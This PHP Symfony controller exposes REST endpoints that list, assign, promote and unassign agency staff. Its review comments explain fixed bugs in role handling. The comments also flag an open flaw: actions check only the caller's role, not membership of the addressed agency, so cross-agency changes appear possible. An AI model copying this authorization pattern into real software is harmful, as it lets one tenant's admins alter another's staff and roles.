Viewing: AgencyStaffController.php
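<?php

namespace AppBundle\Controller\Api;

use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use FOS\RestBundle\Controller\Annotations as Rest;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\JsonResponse;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\ParamConverter;
use Nelmio\ApiDocBundle\Annotation as Doc;
use FOS\RestBundle\Request\ParamFetcher;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Security;
use AppBundle\Entity\Agency;
use AppBundle\Entity\Staff;

/**
 * REST endpoints for the staff members assigned to an agency.
 *
 * Every action is guarded by the ROLE_AGENCY_ADMIN role and several of them
 * grant or revoke that same role, so the manager flag and the role list are
 * the security-sensitive values handled here.
 */
class AgencyStaffController extends Controller
{
    // NOTE(review): the Security expressions below only test the caller's role.
    // Nothing visible in this controller ties the caller to the agency (or its
    // company) addressed by {agencyId}. Unless that is enforced elsewhere
    // (voter, firewall, listener), an admin of one agency can read and change
    // the staff of another one. Confirm and add an object-level check.

    /**
     * Get the list of all staffs assigned to an agency ('agencyId' is the Id of the agency)
     * @param integer $agencyId The id of the agency
     *
     * @Rest\Get("/agencies/{agencyId}/staffs")
     * @ParamConverter("agency", options={"id" = "agencyId"})
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs assigned to an agency",
     *     resource=true,
     *     description="Get the list of all staffs assigned to an agency.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN')")
     */
    public function listAction(Agency $agency)
    {
        // The route placeholder is {agencyId}, so the converter is told explicitly
        // which attribute holds the Agency identifier.
        return $agency->getStaffs();
    }

    /**
     * Get one staff who is assigned to an agency ('agencyId' is the Id of the agency)
     * @param integer $agencyId The id of the agency
     * @param integer $id The id of the staff
     *
     * @Rest\Get("/agencies/{agencyId}/staffs/{id}")
     * @ParamConverter("staff", options={"id" = "id"})
     * @ParamConverter("agency", options={"id" = "agencyId"})
     * @Rest\View(
     *     statusCode = Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs assigned to an agency",
     *     resource=true,
     *     description="Get one staff who is assigned to an agency.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN')")
     */
    public function showAction(Staff $staff, Agency $agency)
    {
        // Without the explicit mapping both entities would be looked up through
        // the {id} attribute, i.e. the agency would be loaded with the staff id.
        if ($staff->getCompany() != $agency->getCompany()) {
            return new JsonResponse(
                ['error' => 'This staff and this agency are not from the same company '],
                Response::HTTP_METHOD_NOT_ALLOWED
            );
        }

        if (!$agency->getStaffs()->contains($staff)) {
            return new JsonResponse(
                ['error' => 'This staff is not assigned to this agency '],
                Response::HTTP_METHOD_NOT_ALLOWED
            );
        }

        return $staff;
    }

    /**
     * Assign a staff to a given agency (the staff and the agency must already exist).
     * @param integer $agencyId The id of the agency
     * @param integer $id The id of the staff to be assigned to the agency
     *
     * @Rest\Post("/agencies/{agencyId}/staffs/{id}")
     * @Rest\View(
     *     statusCode= Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Doc\ApiDoc(
     *     section="Staffs assigned to an agency",
     *     resource=true,
     *     description="Assign a staff to a given agency.",
     * )
     * @Rest\QueryParam(
     *     name="is_manager",
     *     requirements="(true|false)",
     *     nullable=true,
     *     description="Set to true if this staff must be the manager of the agency."
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN')")
     */
    public function addAction(ParamFetcher $paramFetcher, $agencyId, $id)
    {
        $em = $this->getDoctrine()->getManager();
        $agency = $em->getRepository("AppBundle:Agency")->find($agencyId);
        $staff = $em->getRepository("AppBundle:Staff")->find($id);

        if ($agency === null || $staff === null) {
            return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND);
        }

        if ($staff->getCompany() != $agency->getCompany()) {
            return new JsonResponse(
                ['error' => 'This staff and this agency are not from the same company '],
                Response::HTTP_METHOD_NOT_ALLOWED
            );
        }

        // Disabled by the original author; assigning twice is currently accepted.
        // if($agency->getStaffs()->contains($staff)){
        //     return new JsonResponse('This staff is already assigned to this agency', Response::HTTP_CONFLICT);
        // }

        $staff->setAgency($agency);

        // The query parameter arrives as the string "true" or "false"; a plain
        // truthiness test would treat "false" as true and hand out the admin role.
        if ($this->isManagerRequested($paramFetcher->get('is_manager'))) {
            $agency->setManager($staff);
            $this->grantAgencyAdminRole($staff);
        }

        $em->flush();

        return $staff;
    }

    /**
     * Update the status of a staff in an agency (used only to make him become Manager or lose that privilege).
     *
     * @Rest\Put("/agencies/{agencyId}/staffs/{id}")
     * @Rest\View(
     *     statusCode= Response::HTTP_OK,
     *     SerializerGroups = {"LIST", "STAFF_DETAILS"}
     * )
     * @Rest\QueryParam(
     *     name="is_manager",
     *     requirements="(true|false)",
     *     nullable=true,
     *     description="Set to true if this staff must be the manager of the agency."
     * )
     * @Doc\ApiDoc(
     *     section="Staffs assigned to an agency",
     *     resource=true,
     *     description="set/unset a staff as the manager of the agency (the staff must have been previously assigned to the agency).",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN')")
     */
    public function updateAction(ParamFetcher $paramFetcher, $agencyId, $id)
    {
        $em = $this->getDoctrine()->getManager();
        $agency = $em->getRepository("AppBundle:Agency")->find($agencyId);
        $staff = $em->getRepository("AppBundle:Staff")->find($id);

        if ($agency === null || $staff === null) {
            return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND);
        }

        $isManager = $paramFetcher->get('is_manager');

        if ($staff->getAgency() != $agency) {
            return new JsonResponse(
                ['error' => 'This staff is not yet assigned to this agency '],
                Response::HTTP_METHOD_NOT_ALLOWED
            );
        }

        if ($this->isManagerRequested($isManager)) {
            $agency->setManager($staff);
            $this->grantAgencyAdminRole($staff);
        } else {
            // "false" and an omitted parameter both demote, as an omitted
            // parameter did before. Previously "false" compared equal to true
            // and promoted the staff instead.
            // NOTE(review): the agency manager is cleared even when this staff
            // is not the current manager; confirm that is intended.
            $agency->setManager(null);
            $this->revokeAgencyAdminRole($staff);
        }

        $em->flush();

        return $agency;
    }

    /**
     * Delete the assignation of a staff to a given agency (the staff and the agency must already exist).
     * @param integer $agencyId The id of the agency
     * @param integer $id The id of the staff whose assignation should be deleted
     *
     * @Rest\Delete("/agencies/{agencyId}/staffs/{id}")
     * @Rest\View
     * @Doc\ApiDoc(
     *     section="Staffs assigned to an agency",
     *     resource=true,
     *     description="Delete the assignation of a staff to a given agency.",
     * )
     * @Security("has_role('ROLE_AGENCY_ADMIN')")
     */
    public function deleteAction($agencyId, $id)
    {
        $em = $this->getDoctrine()->getManager();
        $agency = $em->getRepository("AppBundle:Agency")->find($agencyId);
        $staff = $em->getRepository("AppBundle:Staff")->find($id);

        if ($agency === null || $staff === null) {
            return new JsonResponse(['error' => 'NOT FOUND '], Response::HTTP_NOT_FOUND);
        }

        if ($staff->getCompany() != $agency->getCompany()) {
            return new JsonResponse(
                ['error' => 'This staff and this agency are not from the same company '],
                Response::HTTP_METHOD_NOT_ALLOWED
            );
        }

        // NOTE(review): only the company is compared, so a staff assigned to a
        // different agency of the same company is unassigned as well; confirm.
        $staff->setAgency(null);

        if ($agency->getManager() == $staff) {
            $agency->setManager(null);
            $this->revokeAgencyAdminRole($staff);
        }

        $em->flush();

        return true;
    }

    /**
     * Tell whether the raw "is_manager" value asks for the manager status.
     *
     * Only the boolean true and the exact string "true" count; "false", null
     * and anything else do not.
     *
     * @param mixed $rawFlag Value returned by the param fetcher
     *
     * @return bool
     */
    private function isManagerRequested($rawFlag)
    {
        return $rawFlag === true || $rawFlag === 'true';
    }

    /**
     * Add ROLE_AGENCY_ADMIN to the staff's roles when it is not there yet.
     *
     * @param Staff $staff Staff being promoted
     */
    private function grantAgencyAdminRole(Staff $staff)
    {
        $roles = $staff->getRoles();

        if (!in_array("ROLE_AGENCY_ADMIN", $roles, true)) {
            $roles[] = "ROLE_AGENCY_ADMIN";
            $staff->setRoles($roles);
        }
    }

    /**
     * Remove ROLE_AGENCY_ADMIN from the staff's roles when it is present.
     *
     * array_search() returns false when the role is missing. The former test
     * "offset >= 0" accepted that false and array_splice() then removed the
     * first, unrelated role of the list.
     *
     * @param Staff $staff Staff being demoted
     */
    private function revokeAgencyAdminRole(Staff $staff)
    {
        $roles = $staff->getRoles();
        $offset = array_search("ROLE_AGENCY_ADMIN", $roles, true);

        if ($offset === false) {
            return;
        }

        array_splice($roles, $offset, 1);
        $staff->setRoles($roles);
    }
}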